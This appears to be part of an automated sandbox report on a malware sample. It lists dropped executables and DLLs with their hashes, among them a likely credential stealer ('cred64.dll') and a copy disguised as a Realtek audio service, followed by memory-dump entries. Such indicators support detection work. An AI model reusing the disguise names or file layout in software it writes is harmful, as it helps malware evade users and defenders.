SHA512f043684854247db8ead2823105942009ca8b8bb3d1d58b80d1ee851fb028afa7374bc29661c46f4e9ca6d5896dacd56a3c297161c3c71f5b4db2dbfd9f797ecd
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeFilesize
6.2MB
MD59e59e36488bfcebe5acba259c6ba6195
SHA165ba9bfa1e66bf09b0d3064746c15246b9fcc049
SHA256f73d823313bd7218e8a3a00916ccbe3137e19ed4679a43a452663dcce1c799d9
SHA512f043684854247db8ead2823105942009ca8b8bb3d1d58b80d1ee851fb028afa7374bc29661c46f4e9ca6d5896dacd56a3c297161c3c71f5b4db2dbfd9f797ecd
-
C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exeFilesize
9.9MB
MD57a5155b804e592d83f8319cbdb27e164
SHA1da63718377b9086ef7f6db6b8b88e45062f31749
SHA2565eb7b2fd13264f066b10946539eff6be750647de246cf791e57ca4c17b0b9c31
SHA5123dbd6745d7b64ef2260e14df08c6aa36ee7e34b218dc11c83f5fbcaa934cf1385e79d208e061b9055c389cd5259ae2081b8dea47fac38844a2043b9a361d0346
-
C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exeFilesize
9.9MB
MD57a5155b804e592d83f8319cbdb27e164
SHA1da63718377b9086ef7f6db6b8b88e45062f31749
SHA2565eb7b2fd13264f066b10946539eff6be750647de246cf791e57ca4c17b0b9c31
SHA5123dbd6745d7b64ef2260e14df08c6aa36ee7e34b218dc11c83f5fbcaa934cf1385e79d208e061b9055c389cd5259ae2081b8dea47fac38844a2043b9a361d0346
-
C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exeFilesize
7.2MB
MD519d3006a093ae7f7dddd0f0fb812bbc3
SHA163ee22b95501be1aaf3a404eeb3deba9c29e5fa1
SHA256821784f00f563c345d56b28f5ac31321e3d63fa193fcaeaa24ff1c5f5799938e
SHA512b4779075f361fb5f38ca2bc6fec216f6098c164ae3cb6beae9f12984898da4b20d54aef525790b730e73cb8b447090f2ba7c74b20082b0d35530e77f6f47a953
-
C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exeFilesize
7.2MB
MD519d3006a093ae7f7dddd0f0fb812bbc3
SHA163ee22b95501be1aaf3a404eeb3deba9c29e5fa1
SHA256821784f00f563c345d56b28f5ac31321e3d63fa193fcaeaa24ff1c5f5799938e
SHA512b4779075f361fb5f38ca2bc6fec216f6098c164ae3cb6beae9f12984898da4b20d54aef525790b730e73cb8b447090f2ba7c74b20082b0d35530e77f6f47a953
-
C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dllFilesize
7.3MB
MD52b62e02b3581980ee5a1dda42fa4f3fe
SHA15c36bfa4a4973e8f694d5c077e7312b1c991aedf
SHA2568c46c2af1cb25bfa8fbbf9d683d72d30ddb2e5d0ecc6bba997b24714cf2b8c91
SHA512255e1b1d51d52872c5e0c54f7807adc3581d36b3dfb8220c818ac38ac7fcea91dd42999ee6ccaef3b9836cd59fcfe19c2669a5b697d627de4c1d9b8ba563eb3d
-
C:\Users\Admin\Locktime\RtkAudUService64.exeFilesize
9.9MB
MD57a5155b804e592d83f8319cbdb27e164
SHA1da63718377b9086ef7f6db6b8b88e45062f31749
SHA2565eb7b2fd13264f066b10946539eff6be750647de246cf791e57ca4c17b0b9c31
SHA5123dbd6745d7b64ef2260e14df08c6aa36ee7e34b218dc11c83f5fbcaa934cf1385e79d208e061b9055c389cd5259ae2081b8dea47fac38844a2043b9a361d0346
-
C:\Users\Admin\Locktime\RtkAudUService64.exeFilesize
9.9MB
MD57a5155b804e592d83f8319cbdb27e164
SHA1da63718377b9086ef7f6db6b8b88e45062f31749
SHA2565eb7b2fd13264f066b10946539eff6be750647de246cf791e57ca4c17b0b9c31
SHA5123dbd6745d7b64ef2260e14df08c6aa36ee7e34b218dc11c83f5fbcaa934cf1385e79d208e061b9055c389cd5259ae2081b8dea47fac38844a2043b9a361d0346
-
\Users\Admin\1000019012\syncfiles.dllFilesize
7.2MB
MD50d079a931e42f554016db36476e55ba7
SHA1d5f1ab52221019c746f1cc59a45ce18d0b817496
SHA256ead2c5aaf92fe07db45b99587f586c7a45f92c67220cd8113a5d2e7bcb320798
SHA5121496f1296df89e1da8780f175631e2551300a99e6c7ea43d2750653fdf6e7ed096fdedd9f0d23b94190ecf418da09cf9c9b6caee5821ba1c457f0294063bbc9e
-
\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dllFilesize
7.3MB
MD52b62e02b3581980ee5a1dda42fa4f3fe
SHA15c36bfa4a4973e8f694d5c077e7312b1c991aedf
SHA2568c46c2af1cb25bfa8fbbf9d683d72d30ddb2e5d0ecc6bba997b24714cf2b8c91
SHA512255e1b1d51d52872c5e0c54f7807adc3581d36b3dfb8220c818ac38ac7fcea91dd42999ee6ccaef3b9836cd59fcfe19c2669a5b697d627de4c1d9b8ba563eb3d
-
\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dllFilesize
7.3MB
MD52b62e02b3581980ee5a1dda42fa4f3fe
SHA15c36bfa4a4973e8f694d5c077e7312b1c991aedf
SHA2568c46c2af1cb25bfa8fbbf9d683d72d30ddb2e5d0ecc6bba997b24714cf2b8c91
SHA512255e1b1d51d52872c5e0c54f7807adc3581d36b3dfb8220c818ac38ac7fcea91dd42999ee6ccaef3b9836cd59fcfe19c2669a5b697d627de4c1d9b8ba563eb3d
-
memory/368-600-0x0000000000000000-mapping.dmp
-
memory/660-639-0x0000000000000000-mapping.dmp
-
memory/840-576-0x0000000000000000-mapping.dmp
-
memory/1236-578-0x0000000000000000-mapping.dmp
-
memory/1404-224-0x0000000000000000-mapping.dmp
-
memory/1472-684-0x00007FF6713E0000-0x00007FF672539000-memory.dmpFilesize
17.3MB
-
memory/1688-519-0x0000000004770000-0x0000000005329000-memory.dmpFilesize
11.7MB
-
memory/1688-459-0x0000000000000000-mapping.dmp
-
memory/1688-507-0x0000000004770000-0x0000000005329000-memory.dmpFilesize
11.7MB
-
memory/1984-566-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/1984-565-0x0000000002A30000-0x0000000002A73000-memory.dmpFilesize
268KB
-
memory/1984-523-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/1984-458-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/2316-239-0x0000000000000000-mapping.dmp
-
memory/2336-585-0x000001E7BBBE0000-0x000001E7BBC56000-memory.dmpFilesize
472KB
-
memory/2336-577-0x000001E7A3540000-0x000001E7A3562000-memory.dmpFilesize
136KB
-
memory/2388-155-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-131-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-158-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-159-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-160-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-161-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-162-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-163-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-164-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-165-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-166-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-167-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-168-0x0000000000E90000-0x0000000000FDA000-memory.dmpFilesize
1.3MB
-
memory/2388-169-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-170-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-121-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-156-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-122-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-123-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-124-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-125-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-126-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-127-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-128-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-120-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-129-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-130-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-157-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-132-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-133-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-134-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-135-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/2388-137-0x0000000000FA0000-0x0000000000FE3000-memory.dmpFilesize
268KB
-
memory/2388-138-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/2388-139-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-140-0x0000000000E90000-0x0000000000FDA000-memory.dmpFilesize
1.3MB
-
memory/2388-154-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-153-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-141-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-142-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-143-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-144-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-145-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-146-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-147-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-148-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-149-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-152-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-151-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2388-150-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/2568-581-0x0000000000000000-mapping.dmp
-
memory/3080-285-0x0000000000000000-mapping.dmp
-
memory/3216-579-0x0000000000000000-mapping.dmp
-
memory/3340-615-0x0000000000000000-mapping.dmp
-
memory/3412-442-0x00000000008B0000-0x000000000157A000-memory.dmpFilesize
12.8MB
-
memory/3412-402-0x0000000000000000-mapping.dmp
-
memory/3412-432-0x00000000008B0000-0x000000000157A000-memory.dmpFilesize
12.8MB
-
memory/3776-330-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3776-216-0x0000000002B90000-0x0000000002BD3000-memory.dmpFilesize
268KB
-
memory/3776-176-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-331-0x0000000002B90000-0x0000000002BD3000-memory.dmpFilesize
268KB
-
memory/3776-177-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-175-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-174-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-173-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-178-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-180-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-181-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-182-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-189-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3776-190-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3776-188-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-187-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-186-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-185-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-171-0x0000000000000000-mapping.dmp
-
memory/3776-184-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3776-183-0x0000000077330000-0x00000000774BE000-memory.dmpFilesize
1.6MB
-
memory/3800-304-0x0000000000000000-mapping.dmp
-
memory/3888-438-0x0000000010000000-0x0000000010B6B000-memory.dmpFilesize
11.4MB
-
memory/3888-364-0x0000000000000000-mapping.dmp
-
memory/4088-584-0x0000000000000000-mapping.dmp
-
memory/4112-636-0x00007FF66D340000-0x00007FF66E499000-memory.dmpFilesize
17.3MB
-
memory/4112-337-0x00007FF66D340000-0x00007FF66E499000-memory.dmpFilesize
17.3MB
-
memory/4112-332-0x0000000000000000-mapping.dmp
-
memory/4152-647-0x0000000000000000-mapping.dmp
-
memory/4240-580-0x0000000000000000-mapping.dmp
-
memory/4316-269-0x0000000000000000-mapping.dmp
-
memory/4316-595-0x0000000000000000-mapping.dmp
-
memory/4440-586-0x0000000000000000-mapping.dmp
-
memory/4440-245-0x0000000000000000-mapping.dmp
-
memory/4580-251-0x0000000000000000-mapping.dmp
-
memory/4840-575-0x0000000000000000-mapping.dmp
-
memory/4844-592-0x0000000000000000-mapping.dmp
-
memory/4928-441-0x0000000000C50000-0x000000000189E000-memory.dmpFilesize
12.3MB
-
memory/4928-338-0x0000000000000000-mapping.dmp
-
memory/4928-355-0x0000000000C50000-0x000000000189E000-memory.dmpFilesize
12.3MB
-
memory/4932-589-0x0000000000000000-mapping.dmp
-
memory/5080-284-0x0000000000000000-mapping.dmp
-
memory/5080-616-0x0000000000000000-mapping.dmp
-
memory/5104-630-0x00007FF6BB851938-mapping.dmp